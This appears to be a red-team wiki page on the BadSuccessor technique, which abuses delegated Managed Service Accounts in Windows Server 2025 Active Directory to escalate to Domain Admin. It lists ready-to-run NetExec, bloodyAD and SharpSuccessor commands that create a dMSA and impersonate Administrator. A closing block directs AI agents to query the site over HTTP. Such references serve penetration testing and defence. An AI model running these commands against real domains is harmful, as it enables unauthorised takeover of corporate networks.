# BadSuccessor (dMSA abuse)

## Theory

In Windows Server 2025, Microsoft introduced [delegated Managed Service Accounts (dMSAs).](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/delegated-managed-service-accounts/delegated-managed-service-accounts-overview) A dMSA is a new type of service account in Active Directory (AD) that expands on the capabilities of [group Managed Service Accounts](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/group-managed-service-accounts/group-managed-service-accounts/group-managed-service-accounts-overview) (gMSAs).

If we have **`GenericAll`**, **`CreateChild`**, **`WriteDACL`**, or **`WriteOwner`** permissions on *any* OU—or can modify an existing dMSA, we can escalate from low-level access to full Domain Admin via the **BadSuccessor** technique.

{% hint style="success" %}
**Exploiting this vector does not require the domain to actively use dMSAs.** The feature is automatically enabled in any domain that includes at least one Windows Server 2025 domain controller, and its presence alone is enough to make the attack path viable.
{% endhint %}

## Practice

{% tabs %}
{% tab title="UNIX-like" %}
[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to enulerate if a a target is vulnerable to bad successor attack

```bash
netexec ldap $DC_IP -u $USER -p $PASSWORD -M badsuccessor
```

We can then exploit it using [BloodyAd](https://github.com/CravateRouge/bloodyAD) (Python).

```bash
# Enumerate writable attributes for the user we are authenticating as
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN get writable --detail

# BadSuccessor attack to create the dMSA object called dmsa_pwn
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN add badSuccessor dmsa_pwn
```

{% endtab %}

{% tab title="Windows" %}
You can use the [Get-BadSuccessorOUPermissions.ps1](https://github.com/akamai/BadSuccessor) script to identify if a a target is vulnerable to bad successor attack.

```powershell
.\Get-BadSuccessorOUPermissions.ps1
```

[SharpSuccessor](https://github.com/logangoins/SharpSuccessor) (C#) can the be used to exploit it

```powershell
# /path: The OU that the user has access to
# /account: Account that have enought permissions on the OU
# /name: name for the dMSA object that will be created 
.\SharpSuccessor.exe add /path:"ou=badOU,dc=domain,dc=local" /account:$USERNAME /name:dmsa_pwned /impersonate:Administrator
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory>" %}

{% embed url="<https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/ad/movement/dacl/badsuccessor-dmsa-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.